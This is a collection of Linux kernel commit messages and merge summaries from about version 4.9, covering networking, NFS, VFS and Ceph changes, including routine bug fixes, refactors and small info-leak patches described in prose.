Use sizeof variable instead of literal number to enhance the readability.
Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Adjacency code only has debugs for the insert case. Add debugs for
the remove path and make both consistently worded to make it easier
to follow the insert and removal with reference counts.
In addition, change the BUG to a WARN_ON. A missing adjacency at
removal time is not cause for a panic.
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Only direct adjacencies are maintained. All upper or lower devices can
be learned via the new walk API which recursively walks the adj_list for
upper devices or lower devices.
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This patch introduces netdev_walk_all_upper_dev_rcu,
netdev_walk_all_lower_dev and netdev_walk_all_lower_dev_rcu. These
functions recursively walk the adj_list of devices to determine all upper
and lower devices.
The functions take a callback function that is invoked for each device
in the list. If the callback returns non-0, the walk is terminated and
the functions return that code back to callers.
v3
- simplified netdev_has_upper_dev_all_rcu and __netdev_has_upper_dev and
removed typecast as suggested by Stephen
v2
- fixed definition of netdev_next_lower_dev_rcu to mirror the upper_dev
version.
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Commit 93409033ae ("net: Add netdev all_adj_list refcnt propagation to
fix panic") propagated the refnr to insert and remove functions tracking
the netdev adjacency graph. However, for the insert path the refnr can
only be 1. Accordingly, remove the refnr argument to make that clear.
ie., the refnr arg in 93409033ae was only needed for the remove path.
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
args.u.name_type is of type unsigned int and is always >= 0.
This fixes the following GCC warning:
net/8021q/vlan.c: In function ‘vlan_ioctl_handler’:
net/8021q/vlan.c:574:14: warning: comparison of unsigned expression >= 0 is always true [-Wtype-limits]
Signed-off-by: Tobias Klauser <tklauser@distanz.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
The variables "tt_local_entry" and "tt_global_entry" were eventually
checked again despite of a corresponding null pointer test before.
* Avoid this double check by reordering a function call sequence
and the better selection of jump targets.
* Omit the initialisation for these variables at the beginning then.
Signed-off-by: Markus Elfring <elfring@users.sourceforge.net>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Check is for max_mtu but message reports min_mtu.
Signed-off-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
rds_conn_path_error already prefixes "RDS:" to the output.
Signed-off-by: Joe Perches <joe@perches.com>
Acked-by: Sowmini Varadhan <sowmini.varadhan@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This macro's last use was removed in commit d769ef81d5
("RDS: Update rds_conn_shutdown to work with rds_conn_path")
so make the macro and the __rds_conn_error function definition
and declaration disappear.
Signed-off-by: Joe Perches <joe@perches.com>
Acked-by: Sowmini Varadhan <sowmini.varadhan@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
If the gateway is set on an ILA route we don't need to bother with using
the destination cache in the ILA route. Translation does not change the
routing in this case so we can stick with orig_output in the lwstate
output function.
Tested: Ran netperf with and without gateway for LWT route.
Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
With the new stub for cfg80211_get_station(), we can now build the
BATMAN V protocol even with a kernel that was built without any
wireless support.
Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
The argument "type" passed to the batadv_dbg_arp() function is
never used. Remove it.
Signed-off-by: Antonio Quartulli <a@unstable.cc>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
The forw_packet list node is wrongly attributed to the icmp socket code.
Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
The function batadv_sum_counter is only used in soft-interface.c and has no
special relevance for main.h.
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Add a dst_cache to ila_lwt structure. This holds a cached route for the
translated address. In ila_output we now perform a route lookup after
translation and if possible (destination in original route is full 128
bits) we set the dst_cache. Subsequent calls to ila_output can then use
the cache to avoid the route lookup.
This eliminates the need to set the gateway on ILA routes as previously
was being done. Now we can do something like:
./ip route add 3333::2000:0:0:2/128 encap ila 2222:0:0:2 \
csum-mode neutral-map dev eth0 ## No via needed!
Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Users of lwt tunnels may set up some secondary state in build_state
function. Add a corresponding destroy_state function to allow users to
clean up state. This destroy state function is called from lwstate_free.
Also, we now free lwstate using kfree_rcu so user can assume structure
is not freed before rcu.
Acked-by: Roopa Prabhu <roopa@cumulusnetworks.com>
Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Up until now, 'action mirred' supported only egress actions (either
TCA_EGRESS_REDIR or TCA_EGRESS_MIRROR).
This patch implements the corresponding ingress actions
TCA_INGRESS_REDIR and TCA_INGRESS_MIRROR.
This allows attaching filters whose target is to hand matching skbs into
the rx processing of a specified device.
Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Cc: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Jamal Hadi Salim <jhs@mojatatu.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Move detection logic that tests whether device expects skb data to point
at mac_header upon xmit into a function.
Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
'tcfm_ok_push' specifies whether a mac_len sized push is needed upon
egress to the target device (if action is performed at ingress).
Rename it to 'tcfm_mac_header_xmit' as this is actually an attribute of
the target device (and use a bool instead of int).
This allows to decouple the attribute from the action to be taken.
Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This reverts commit 6ae23ad362.
The code has been in kernel since 4.4 but there are no in tree
code that uses. Unused code is broken code, remove it.
Signed-off-by: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Pull networking fixes from David Miller:
1) Fix various build warnings in tlan/qed/xen-netback drivers, from
Arnd Bergmann.
2) Propagate proper error code in strparser's strp_recv(), from Geert
Uytterhoeven.
3) Fix accidental broadcast of RTM_GETTFILTER responses, from Eric
Dumazret.
4) Need to use list_for_each_entry_safe() in qed driver, from Wei
Yongjun.
5) Openvswitch 802.1AD bug fixes from Jiri Benc.
6) Cure BUILD_BUG_ON() in mlx5 driver, from Tom Herbert.
7) Fix UDP ipv6 checksumming in netvsc driver, from Stephen Hemminger.
8) stmmac driver fixes from Giuseppe CAVALLARO.
9) Fix access to mangled IP6CB in tcp, from Eric Dumazet.
10) Fix info leaks in tipc and rtnetlink, from Dan Carpenter.
* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net: (27 commits)
net: bridge: add the multicast_flood flag attribute to brport_attrs
net: axienet: Remove unused parameter from __axienet_device_reset
liquidio: CN23XX: fix a loop timeout
net: rtnl: info leak in rtnl_fill_vfinfo()
tipc: info leak in __tipc_nl_add_udp_addr()
net: ipv4: Do not drop to make_route if oif is l3mdev
net: phy: Trigger state machine on state change and not polling.
ipv6: tcp: restore IP6CB for pktoptions skbs
netvsc: Remove mistaken udp.h inclusion.
xen-netback: fix type mismatch warning
stmmac: fix error check when init ptp
stmmac: fix ptp init for gmac4
qed: fix old-style function definition
netvsc: fix checksum on UDP IPV6
net_sched: reorder pernet ops and act ops registrations
xen-netback: fix guest Rx stall detection (after guest Rx refactor)
drivers/ptp: Fix kernel memory disclosure
net/mlx5: Add MLX5_ARRAY_SET64 to fix BUILD_BUG_ON
qmi_wwan: add support for Quectel EC21 and EC25
openvswitch: add NETIF_F_HW_VLAN_STAG_TX to internal dev
...
Highlights include:
Stable bugfixes:
- sunrpc: fix writ espace race causing stalls
- NFS: Fix inode corruption in nfs_prime_dcache()
- NFSv4: Don't report revoked delegations as valid in
nfs_have_delegation()
- NFSv4: nfs4_copy_delegation_stateid() must fail if the delegation is
invalid
- NFSv4: Open state recovery must account for file permission changes
- NFSv4.2: Fix a reference leak in nfs42_proc_layoutstats_generic
Features:
- Add support for tracking multiple layout types with an ordered list
- Add support for using multiple backchannel threads on the client
- Add support for pNFS file layout session trunking
- Delay xprtrdma use of DMA API (for device driver removal)
- Add support for xprtrdma remote invalidation
- Add support for larger xprtrdma inline thresholds
- Use a scatter/gather list for sending xprtrdma RPC calls
- Add support for the CB_NOTIFY_LOCK callback
- Improve hashing sunrpc auth_creds by using both uid and gid
Bugfixes:
- Fix xprtrdma use of DMA API
- Validate filenames before adding to the dcache
- Fix corruption of xdr->nwords in xdr_copy_to_scratch
- Fix setting buffer length in xdr_set_next_buffer()
- Don't deadlock the state manager on the SEQUENCE status flags
- Various delegation and stateid related fixes
- Retry operations if an interrupted slot receives EREMOTEIO
- Make nfs boot time y2038 safe
-----BEGIN PGP SIGNATURE-----
iQIcBAABCAAGBQJX/+ZfAAoJENfLVL+wpUDr5MUP/16s2Kp9ZZZZ7ICi3yrHOzb0
9WpCOmbKUIELXl8YgkxlvPUYMzTQTIc32TwbVgdFV0g41my/0+O3z3+IiTrUGxH5
8LgouMWBZ9KKmyUB//+KQAXr3j/bvDdF6Li6wJfz8a2o+9xT4oTkK1+Js8p0kn6e
HNKfRknfCKwvE+j4tPCLfs2RX5qDyBFILXwWhj1fAbmT3rbnp+QqkXD4mWUrXb9z
DBgxciXRhOkOQQAD2KQBFd2kUqWDZ5ED23b+aYsu9D3VCW45zitBqQFAxkQWL0hp
x8Mp+MDCxlgdEaGQPUmUiDtPkG1X9ZxUJCAwaJWWsZaItwR2Il+en2sETctnTZ1X
0IAxZVFdolzSeLzIfNx3OG32JdWJdaNjUzkIZam8gO6i1f6PAmK4alR0J3CT31nJ
/OEN76o1E7acGWRMmj+MAZ2U5gPfR7EitOzyE8ZUPcHgyeGMiynjwi56WIpeSvT2
F/Sp5kRe5+D5gtnYuppGp7Srp5vYdtFaz1zgPDUKpDLcxfDweO8AHGjJf3Zmrunx
X24yia4A14CnfcUy4vKpISXRykmkG/3Z0tpWwV53uXZm4nlQfRc7gPibiW7Ay521
af8sDoItW98K3DK5NQU7IUn83ua1TStzpoqlAEafRw//g9zPMTbhHvNvOyrRfrcX
kjWn6hNblMu9M34JOjtu
=XOrF
-----END PGP SIGNATURE-----
Merge tag 'nfs-for-4.9-1' of git://git.linux-nfs.org/projects/anna/linux-nfs
Pull NFS client updates from Anna Schumaker:
"Highlights include:
Stable bugfixes:
- sunrpc: fix writ espace race causing stalls
- NFS: Fix inode corruption in nfs_prime_dcache()
- NFSv4: Don't report revoked delegations as valid in nfs_have_delegation()
- NFSv4: nfs4_copy_delegation_stateid() must fail if the delegation is invalid
- NFSv4: Open state recovery must account for file permission changes
- NFSv4.2: Fix a reference leak in nfs42_proc_layoutstats_generic
Features:
- Add support for tracking multiple layout types with an ordered list
- Add support for using multiple backchannel threads on the client
- Add support for pNFS file layout session trunking
- Delay xprtrdma use of DMA API (for device driver removal)
- Add support for xprtrdma remote invalidation
- Add support for larger xprtrdma inline thresholds
- Use a scatter/gather list for sending xprtrdma RPC calls
- Add support for the CB_NOTIFY_LOCK callback
- Improve hashing sunrpc auth_creds by using both uid and gid
Bugfixes:
- Fix xprtrdma use of DMA API
- Validate filenames before adding to the dcache
- Fix corruption of xdr->nwords in xdr_copy_to_scratch
- Fix setting buffer length in xdr_set_next_buffer()
- Don't deadlock the state manager on the SEQUENCE status flags
- Various delegation and stateid related fixes
- Retry operations if an interrupted slot receives EREMOTEIO
- Make nfs boot time y2038 safe"
* tag 'nfs-for-4.9-1' of git://git.linux-nfs.org/projects/anna/linux-nfs: (100 commits)
NFSv4.2: Fix a reference leak in nfs42_proc_layoutstats_generic
fs: nfs: Make nfs boot time y2038 safe
sunrpc: replace generic auth_cred hash with auth-specific function
sunrpc: add RPCSEC_GSS hash_cred() function
sunrpc: add auth_unix hash_cred() function
sunrpc: add generic_auth hash_cred() function
sunrpc: add hash_cred() function to rpc_authops struct
Retry operation on EREMOTEIO on an interrupted slot
pNFS: Fix atime updates on pNFS clients
sunrpc: queue work on system_power_efficient_wq
NFSv4.1: Even if the stateid is OK, we may need to recover the open modes
NFSv4: If recovery failed for a specific open stateid, then don't retry
NFSv4: Fix retry issues with nfs41_test/free_stateid
NFSv4: Open state recovery must account for file permission changes
NFSv4: Mark the lock and open stateids as invalid after freeing them
NFSv4: Don't test open_stateid unless it is set
NFSv4: nfs4_do_handle_exception() handle revoke/expiry of a single stateid
NFS: Always call nfs_inode_find_state_and_recover() when revoking a delegation
NFSv4: Fix a race when updating an open_stateid
NFSv4: Fix a race in nfs_inode_reclaim_delegation()
...
benefit from user testing:
Anna Schumacker contributed a simple NFSv4.2 COPY implementation. COPY
is already supported on the client side, so a call to copy_file_range()
on a recent client should now result in a server-side copy that doesn't
require all the data to make a round trip to the client and back.
Jeff Layton implemented callbacks to notify clients when contended locks
become available, which should reduce latency on workloads with
contended locks.
-----BEGIN PGP SIGNATURE-----
iQIcBAABAgAGBQJX/mcsAAoJECebzXlCjuG+MU0P/3SzTLGYXU5yOTAorx255/uf
fUVKQQhTzzaA2xj3gWWWztYx3y0ZJUVgwU56a+Ap5Z8/goqDQ78H+ePEc+MG7BT/
/UXS/bITvt0MP/dvPrDzhSltvqx/wpelLPBo29hGLlAQ2dsnD4Y75IbOOQccWqcC
iD2v6x7lnpWZ7j9Zhwzg/JNQHwISIb7tiLoYBjfcdNDEMU76KIyhxD0Cx9MSeBzH
9Rq/oEdwGDFS5WqVfNe2jxbngoauq1IupziQ2eQGv2D/POyXCx8fphoYjDz1XaW8
PxaJtJtM2owPGG+z2CxklJqNaS1Z4F+oppjg+nf4i/ibxmIBaTy8NluASX3vMh69
CDO1+ly+TiF0l1VqMOQJWRnqn1qGk6fLpF6P1Ac62B0oWpeLGU7nmik7XN1ORgsi
8ksxRKNAWeprZo3wl5xNrADu/wlZ7XCJTc4QoHEgYT04aHF+j8EMCHv+mtZ8+Bwn
WWiA8iItZOgXV4vitCRJlvsixjYvmF3djPIoI2Lt5KDWIg+eL89sKwzTALSfeC4m
Vjb0svzPX1MmZCNP1rCStFbl3gZYXZyqPk+uA6M7H8mjAjVeKxRPowWpMBgvYZHr
FjCPb878bAuqCeBVbIyOLLcKWBLTw8PsUWZAor3gNg454JGkMjLUyJ/S22Cz5Nbo
HdjoiTJtbPrHnCwTMXwa
=nozl
-----END PGP SIGNATURE-----
Merge tag 'nfsd-4.9' of git://linux-nfs.org/~bfields/linux
Pull nfsd updates from Bruce Fields:
"Some RDMA work and some good bugfixes, and two new features that could
benefit from user testing:
- Anna Schumacker contributed a simple NFSv4.2 COPY implementation.
COPY is already supported on the client side, so a call to
copy_file_range() on a recent client should now result in a
server-side copy that doesn't require all the data to make a round
trip to the client and back.
- Jeff Layton implemented callbacks to notify clients when contended
locks become available, which should reduce latency on workloads
with contended locks"
* tag 'nfsd-4.9' of git://linux-nfs.org/~bfields/linux:
NFSD: Implement the COPY call
nfsd: handle EUCLEAN
nfsd: only WARN once on unmapped errors
exportfs: be careful to only return expected errors.
nfsd4: setclientid_confirm with unmatched verifier should fail
nfsd: randomize SETCLIENTID reply to help distinguish servers
nfsd: set the MAY_NOTIFY_LOCK flag in OPEN replies
nfs: add a new NFS4_OPEN_RESULT_MAY_NOTIFY_LOCK constant
nfsd: add a LRU list for blocked locks
nfsd: have nfsd4_lock use blocking locks for v4.1+ locks
nfsd: plumb in a CB_NOTIFY_LOCK operation
NFSD: fix corruption in notifier registration
svcrdma: support Remote Invalidation
svcrdma: Server-side support for rpcrdma_connect_private
rpcrdma: RDMA/CM private message data structure
svcrdma: Skip put_page() when send_reply() fails
svcrdma: Tail iovec leaves an orphaned DMA mapping
nfsd: fix dprintk in nfsd4_encode_getdeviceinfo
nfsd: eliminate cb_minorversion field
nfsd: don't set a FL_LAYOUT lease for flexfiles layouts
When I added the multicast flood control flag, I also added an attribute
for it for sysfs similar to other flags, but I forgot to add it to
brport_attrs.
Fixes: b6cb5ac833 ("net: bridge: add per-port multicast flood flag")
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
The "vf_vlan_info" struct ends with a 2 byte struct hole so we have to
memset it to ensure that no stack information is revealed to user space.
Fixes: 79aab093a0 ('net: Update API for VF vlan protocol 802.1ad support')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
We should clear out the padding and unused struct members so that we
don't expose stack information to userspace.
Fixes: fdb3accc2c ('tipc: add the ability to get UDP options via netlink')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Commit e0d56fdd73 was a bit aggressive removing l3mdev calls in
the IPv4 stack. If the fib_lookup fails we do not want to drop to
make_route if the oif is an l3mdev device.
Also reverts 19664c6a00 ("net: l3mdev: Remove netif_index_is_l3_master")
which removed netif_index_is_l3_master.
Fixes: e0d56fdd73 ("net: l3mdev: remove redundant calls")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This patch adds vlan and address to warning messages printed
in the bridge fdb code for debuggability.
Signed-off-by: Roopa Prabhu <roopa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Krister reported a kernel NULL pointer dereference after
tcf_action_init_1() invokes a_o->init(), it is a race condition
where one thread calling tcf_register_action() to initialize
the netns data after putting act ops in the global list and
the other thread searching the list and then calling
a_o->init(net, ...).
Fix this by moving the pernet ops registration before making
the action ops visible. This is fine because: a) we don't
rely on act_base in pernet ops->init(), b) in the worst case we
have a fully initialized netns but ops is still not ready so
new actions still can't be created.
Reported-by: Krister Johansen <kjlx@templeofstupid.com>
Tested-by: Krister Johansen <kjlx@templeofstupid.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
The internal device does support 802.1AD offloading since 018c1dda5f
("openvswitch: 802.1AD Flow handling, actions, vlan parsing, netlink
attributes").
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
When the packet has its vlan tag in skb->vlan_tci, the length of the VLAN
header is not counted in skb->len. It doesn't make sense to subtract it.
Fixes: 018c1dda5f ("openvswitch: 802.1AD Flow handling, actions, vlan parsing, netlink attributes")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
This code is called whenever flow key is being extracted from the packet.
The packet may be as likely vlan tagged as not.
Fixes: 018c1dda5f ("openvswitch: 802.1AD Flow handling, actions, vlan parsing, netlink attributes")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
There are two ways to get tc filters from kernel to user space.
1) Full dump (tc_dump_tfilter())
2) RTM_GETTFILTER to get one precise filter, reducing overhead.
The second operation is unfortunately broadcasting its result,
polluting "tc monitor" users.
This patch makes sure only the requester gets the result, using
netlink_unicast() instead of rtnetlink_send()
Jamal cooked an iproute2 patch to implement "tc filter get" operation,
but other user space libraries already use RTM_GETTFILTER when a single
filter is queried, instead of dumping all filters.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
The prsctp polices include ttl expires policy already, we should remove
the old ttl expires codes, and just adjust the new polices' codes to be
compatible with the old one for users.
This patch is to remove all the old expires codes, and if prsctp polices
are not set, it will still set msg's expires_at and check the expires in
sctp_check_abandoned.
Note that asoc->prsctp_enable is set by default, so users can't feel any
difference even if they use the old expires api in userspace.
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Now sctp uses chunk->resent to record if a chunk is retransmitted, for
RTT measurements with retransmitted DATA chunks. chunk->sent_count was
introduced to record how many times one chunk has been sent for prsctp
RTX policy before. We actually can know if one chunk is retransmitted
by checking chunk->sent_count is greater than 1.
This patch is to remove resent from sctp_chunk and reuse sent_count
to avoid retransmitted chunks for RTT measurements.
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
With centralized MTU checking, there's nothing productive done by
eth_change_mtu that isn't already done in dev_set_mtu, so mark it as
deprecated and remove all usage of it in the kernel. All callers have been
audited for calls to alloc_etherdev* or ether_setup directly, which means
they all have a valid dev->min_mtu and dev->max_mtu. Now eth_change_mtu
prints out a netdev_warn about being deprecated, for the benefit of
out-of-tree drivers that might be utilizing it.
Of note, dvb_net.c actually had dev->mtu = 4096, while using
eth_change_mtu, meaning that if you ever tried changing it's mtu, you
couldn't set it above 1500 anymore. It's now getting dev->max_mtu also set
to 4096 to remedy that.
v2: fix up lantiq_etop, missed breakage due to drive not compiling on x86
CC: netdev@vger.kernel.org
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
While looking into an MTU issue with sfc, I started noticing that almost
every NIC driver with an ndo_change_mtu function implemented almost
exactly the same range checks, and in many cases, that was the only
practical thing their ndo_change_mtu function was doing. Quite a few
drivers have either 68, 64, 60 or 46 as their minimum MTU value checked,
and then various sizes from 1500 to 65535 for their maximum MTU value. We
can remove a whole lot of redundant code here if we simple store min_mtu
and max_mtu in net_device, and check against those in net/core/dev.c's
dev_set_mtu().
In theory, there should be zero functional change with this patch, it just
puts the infrastructure in place. Subsequent patches will attempt to start
using said infrastructure, with theoretically zero change in
functionality.
CC: netdev@vger.kernel.org
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
A packet filter might be installed for instance with setsockopt
SO_ATTACH_FILTER. af_iucv currently queues skbs rejected by filter
into the backlog queue. This does not make sense, since packets
rejected by filter can be dropped immediately. This patch adds
separate sk_filter return code checking, and dropping of packets
if applicable.
Signed-off-by: Ursula Braun <ubraun@linux.vnet.ibm.com>
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
If a socket program has shut down the socket for sending, it can still
receive an undetermined number of packets. The AF_IUCV protocol for
HIPER transport requires sending of a WIN flag from time to time
from the receiver to the sender, otherwise the peer cannot continue
sending. That means sending of control flags must still work, even
though the AF_IUCV socket is shutdown for sending data.
sock_alloc_send_skb() returns with error EPIPE, if socket sk_shutdown
is SEND_SHUTDOWN. Thus this patch temporarily removes the send
shutdown attribute from the socket to enable transfer of control
flags.
Signed-off-by: Ursula Braun <ubraun@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
With m68k-linux-gnu-gcc-4.1:
net/strparser/strparser.c: In function ‘strp_recv’:
net/strparser/strparser.c:98: warning: ‘err’ may be used uninitialized in this function
Pass "len" (which is an error code when negative) instead of the
uninitialized "err" variable to fix this.
Fixes: 43a0c6751a ("strparser: Stream parser for messages")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
If mpls headers were pushed to a defragmented packet, the refragmentation no
longer works correctly after 48d2ab609b ("net: mpls: Fixups for GSO"). The
network header has to be shifted after the mpls headers for the
fragmentation and restored afterwards.
Fixes: 48d2ab609b ("net: mpls: Fixups for GSO")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
The ethtool api {get|set}_settings is deprecated.
We move this driver to new api {get|set}_link_ksettings.
Signed-off-by: Philippe Reynes <tremyfr@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Kernel source files need not include <linux/kconfig.h> explicitly
because the top Makefile forces to include it with:
-include $(srctree)/include/linux/kconfig.h
This commit removes explicit includes except the following:
* arch/s390/include/asm/facilities_src.h
* tools/testing/radix-tree/linux/kernel.h
These two are used for host programs.
Link: http://lkml.kernel.org/r/1473656164-11929-1-git-send-email-yamada.masahiro@socionext.com
Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Pull networking fixes from David Miller:
1) Netfilter list handling fix, from Linus.
2) RXRPC/AFS bug fixes from David Howells (oops on call to serviceless
endpoints, build warnings, missing notifications, etc.) From David
Howells.
3) Kernel log message missing newlines, from Colin Ian King.
4) Don't enter direct reclaim in netlink dumps, the idea is to use a
high order allocation first and fallback quickly to a 0-order
allocation if such a high-order one cannot be done cheaply and
without reclaim. From Eric Dumazet.
5) Fix firmware download errors in btusb bluetooth driver, from Ethan
Hsieh.
6) Missing Kconfig deps for QCOM_EMAC, from Geert Uytterhoeven.
7) Fix MDIO_XGENE dup Kconfig entry. From Laura Abbott.
8) Constrain ipv6 rtr_solicits sysctl values properly, from Maciej
Żenczykowski.
* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net: (65 commits)
netfilter: Fix slab corruption.
be2net: Enable VF link state setting for BE3
be2net: Fix TX stats for TSO packets
be2net: Update Copyright string in be_hw.h
be2net: NCSI FW section should be properly updated with ethtool for BE3
be2net: Provide an alternate way to read pf_num for BEx chips
wan/fsl_ucc_hdlc: Fix size used in dma_free_coherent()
net: macb: NULL out phydev after removing mdio bus
xen-netback: make sure that hashes are not send to unaware frontends
Fixing a bug in team driver due to incorrect 'unsigned int' to 'int' conversion
MAINTAINERS: add myself as a maintainer of xen-netback
ipv6 addrconf: disallow rtr_solicits < -1
Bluetooth: btusb: Fix atheros firmware download error
drivers: net: phy: Correct duplicate MDIO_XGENE entry
ethernet: qualcomm: QCOM_EMAC should depend on HAS_DMA and HAS_IOMEM
net: ethernet: mediatek: remove hwlro property in the device tree
net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi
net: ethernet: mediatek: get the chip id by ETHDMASYS registers
net: bgmac: Fix errant feature flag check
netlink: do not enter direct reclaim from netlink_dump()
...
Use the correct pattern for singly linked list insertion and
deletion. We can also calculate the list head outside of the
mutex.
Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Reviewed-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
net/netfilter/core.c | 108 ++++++++++++++++-----------------------------------
1 file changed, 33 insertions(+), 75 deletions(-)
Pull more vfs updates from Al Viro:
">rename2() work from Miklos + current_time() from Deepa"
* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs:
fs: Replace current_fs_time() with current_time()
fs: Replace CURRENT_TIME_SEC with current_time() for inode timestamps
fs: Replace CURRENT_TIME with current_time() for inode timestamps
fs: proc: Delete inode time initializations in proc_alloc_inode()
vfs: Add current_time() api
vfs: add note about i_op->rename changes to porting
fs: rename "rename2" i_op to "rename"
vfs: remove unused i_op->rename
fs: make remaining filesystems use .rename2
libfs: support RENAME_NOREPLACE in simple_rename()
fs: support RENAME_NOREPLACE for local filesystems
ncpfs: fix unused variable warning
Pull vfs xattr updates from Al Viro:
"xattr stuff from Andreas
This completes the switch to xattr_handler ->get()/->set() from
->getxattr/->setxattr/->removexattr"
* 'work.xattr' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs:
vfs: Remove {get,set,remove}xattr inode operations
xattr: Stop calling {get,set,remove}xattr inode operations
vfs: Check for the IOP_XATTR flag in listxattr
xattr: Add __vfs_{get,set,remove}xattr helpers
libfs: Use IOP_XATTR flag for empty directory handling
vfs: Use IOP_XATTR flag for bad-inode handling
vfs: Add IOP_XATTR inode operations flag
vfs: Move xattr_resolve_name to the front of fs/xattr.c
ecryptfs: Switch to generic xattr handlers
sockfs: Get rid of getxattr iop
sockfs: getxattr: Fail with -EOPNOTSUPP for invalid attribute names
kernfs: Switch to generic xattr handlers
hfs: Switch to generic xattr handlers
jffs2: Remove jffs2_{get,set,remove}xattr macros
xattr: Remove unnecessary NULL attribute name check
with maintenance operations offloaded to userspace (Douglas Fuller,
Mike Christie and myself). Another block device bullet is a series
fixing up layering error paths (myself).
On the filesystem side, we've got patches that improve our handling of
buffered vs dio write races (Neil Brown) and a few assorted fixes from
Zheng. Also included a couple of random cleanups and a minor CRUSH
update.
